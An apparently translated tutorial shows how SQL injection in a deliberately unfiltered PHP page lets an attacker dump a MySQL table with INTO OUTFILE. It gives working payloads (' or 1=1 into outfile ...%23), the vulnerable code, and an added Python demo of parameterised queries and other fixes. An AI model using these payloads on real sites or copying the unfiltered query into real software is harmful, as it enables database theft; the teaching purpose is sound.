This article draws on some of my own experience to show how an attacker can use a SQL injection vulnerability in your application to download your database. Feel free to reference it if you need it.
Create a table in the database:
The code is as follows:

```sql
CREATE TABLE `article` (
  `ArticleID` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) CHARACTER SET utf8 NOT NULL DEFAULT '',  -- length was garbled in the original; 255 assumed
  `Content` text CHARACTER SET utf8 NOT NULL,
  PRIMARY KEY (`ArticleID`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;
```
I won't post the INSERT statements that populate the table; you can download them and import them directly into the database.
Next, write a page that handles user requests. We deliberately do not filter the data submitted by the user, which leaves a SQL injection vulnerability for testing.
The code is as follows (note that it uses the old mysql_* extension, which was removed in PHP 7; the vulnerability itself has nothing to do with the extension):

```php
<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "Test";
$id = $_GET['id']; // id is used unfiltered: this is the injection point
$conn = mysql_connect($servername, $dbusername, $dbpassword) or die("database connection failed");
mysql_select_db($dbname, $conn);
mysql_query('SET NAMES UTF8');
// The raw parameter is concatenated straight into the query string
$sql = "SELECT * FROM article WHERE articleid='$id'";
$result = mysql_query($sql, $conn);
$row = mysql_fetch_array($result);
echo "Dragging libraries with SQL injection vulnerabilities";
if (!$row) {
    echo "The record does not exist";
    exit;
}
// PHP array keys are case-sensitive, so the key must match the column name `Content`
echo "Title: " . $row['title'];
echo "Content: " . $row['Content'];
?>
```
Enter the following directly in the browser's address bar:

```
http://127.0.0.1/marcofly/phpstudy/sqlinsert/showart.php?id=1
```
This fetches the record with ID 1 from the article table, and the page displays its title and content.
Next, let's look at how to download the article table through this vulnerability. Assume the injection point has already been located, typically by a combination of a scanning tool and manual testing.
Append the following to the URL in the address bar, directly after id=1:
The code is as follows:

```
' into outfile 'e:/sql.txt'%23
```
Analysis: %23 is the URL encoding of #. If you type a raw # in the address bar, the browser treats it and everything after it as a fragment identifier and never sends it to the server, so the # would not reach the database at all. Sending %23 delivers a literal # to the server, and MySQL treats # as the start of a single-line comment, so the rest of the statement (the application's own trailing quote) is commented out.
After running it, open the E: drive: a file sql.txt has appeared, and it contains one record from the article table. Two conditions have to hold for this to work: the database account the application connects with needs the FILE privilege, and the path has to be permitted by the server's secure_file_priv setting. The file is written by the MySQL server process on the database host, not by the web server, and MySQL refuses to overwrite an existing file, so each attempt needs a fresh file name.
Why only one record? Does the table contain only one? No: we only retrieved the record with ID 1. Can we download every record in the article table in one go?
Yes, as long as the SQL statement you construct is flexible enough (once again, it comes down to how flexibly you can construct the statement).
Analysis: when we append ' into outfile 'e:/sql.txt'%23 to id=1 in the address bar, the query the server assembles becomes:
The code is as follows:

```sql
SELECT * FROM article WHERE articleid='1' into outfile 'e:/sql.txt'#'
```
After a little more thought, we can send id=' or 1=1 into outfile 'e:/whf.txt'%23 instead, which makes the server assemble this statement:
The code is as follows:

```sql
SELECT * FROM article WHERE articleid='' or 1=1 into outfile 'e:/whf.txt'#'
```
Now the WHERE clause is always true; in other words, the statement is equivalent to:
The code is as follows:

```sql
SELECT * FROM article INTO OUTFILE 'e:/whf.txt'#'
```
So the SELECT runs first and retrieves every row of the article table, and INTO OUTFILE 'e:/whf.txt' writes all of them out to the file.
If you don't believe it, try it yourself...
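The following is an added example, not code from the original post. It reproduces, in Python, the two things the article reasons about: how the payloads above turn into SQL once showart.php concatenates them, and why the comment marker has to be sent as %23 rather than a raw #. It then runs the WHERE-bypass against an in-memory SQLite table filled with constructed sample rows, once through string concatenation (the page's vulnerable pattern) and once through a parameterised query, which is the fix. SQLite has neither the # comment nor INTO OUTFILE, so the executed variant uses the -- comment, which MySQL also accepts; the file-writing step is MySQL-specific and is only shown as the assembled query string. The sample rows, the table layout and the URLs with an e:/ path are assumptions made for the demonstration.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed sample rows standing in for the page's article table.
SAMPLE_ROWS = [
    (1, "first article", "content one"),
    (2, "second article", "content two"),
    (3, "third article", "content three"),
]

# The page's single-record payload, sent with %23 and with a raw '#'.
URL_ENCODED = "http://127.0.0.1/marcofly/phpstudy/sqlinsert/showart.php?id=1' into outfile 'e:/sql.txt'%23"
URL_RAW_HASH = "http://127.0.0.1/marcofly/phpstudy/sqlinsert/showart.php?id=1' into outfile 'e:/sql.txt'#"


def id_param_from_url(url):
    """Return (value of ?id=, fragment) as the server would see them.

    urlsplit treats everything after a raw '#' as the fragment, which a
    browser never transmits, so the comment marker is lost unless it is
    percent-encoded as %23; parse_qs decodes %23 back into '#'.
    """
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)
    return params.get("id", [""])[0], parts.fragment


def query_from_id(raw_id):
    """Assemble the query exactly the way showart.php does (vulnerable)."""
    return f"SELECT * FROM article WHERE articleid='{raw_id}'"


def make_db():
    """In-memory SQLite stand-in for the article table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE article (articleid INTEGER PRIMARY KEY, title TEXT, content TEXT)"
    )
    conn.executemany("INSERT INTO article VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def fetch_vulnerable(conn, raw_id):
    """String-concatenated query: the attacker's text is executed as SQL."""
    return conn.execute(query_from_id(raw_id)).fetchall()


def fetch_safe(conn, raw_id):
    """Parameterised query: the same text is only ever compared as a value."""
    return conn.execute(
        "SELECT * FROM article WHERE articleid=?", (raw_id,)
    ).fetchall()


def run_demo():
    """Run both the MySQL string assembly and the SQLite bypass; return results."""
    conn = make_db()
    # SQLite does not accept '#' as a comment, so the executed payload uses
    # '-- ' (trailing space required), which MySQL accepts as well.
    all_rows_payload = "' or 1=1 -- "
    return {
        # What MySQL would receive for the page's two payloads (strings only).
        "mysql_single_row": query_from_id("1' into outfile 'e:/sql.txt'#"),
        "mysql_all_rows": query_from_id("' or 1=1 into outfile 'e:/whf.txt'#"),
        # Executed against SQLite.
        "normal": fetch_vulnerable(conn, "1"),
        "vulnerable": fetch_vulnerable(conn, all_rows_payload),  # every row
        "safe": fetch_safe(conn, all_rows_payload),  # no row matches the literal text
        "safe_normal": fetch_safe(conn, "1"),
    }


if __name__ == "__main__":
    print("encoded :", id_param_from_url(URL_ENCODED))
    print("raw hash:", id_param_from_url(URL_RAW_HASH))
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The "safe" result is the whole fix: with a placeholder, the database never parses the attacker's text as SQL, so ' or 1=1 is compared against articleid as an ordinary string and matches nothing. In the PHP above the equivalent change is a prepared statement (mysqli or PDO) or, since the id is numeric, casting it with intval() before it touches the query. Removing the FILE privilege from the application's database account and leaving secure_file_priv at its restrictive default closes the INTO OUTFILE path even if an injection remains.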
With a SQL injection vulnerability we can also guess table names and column names, recover a user's password one character at a time (with the LEFT function, for example), and so on. Of course, if you can dump the whole table directly as demonstrated above, there is no need to guess table or column names at all.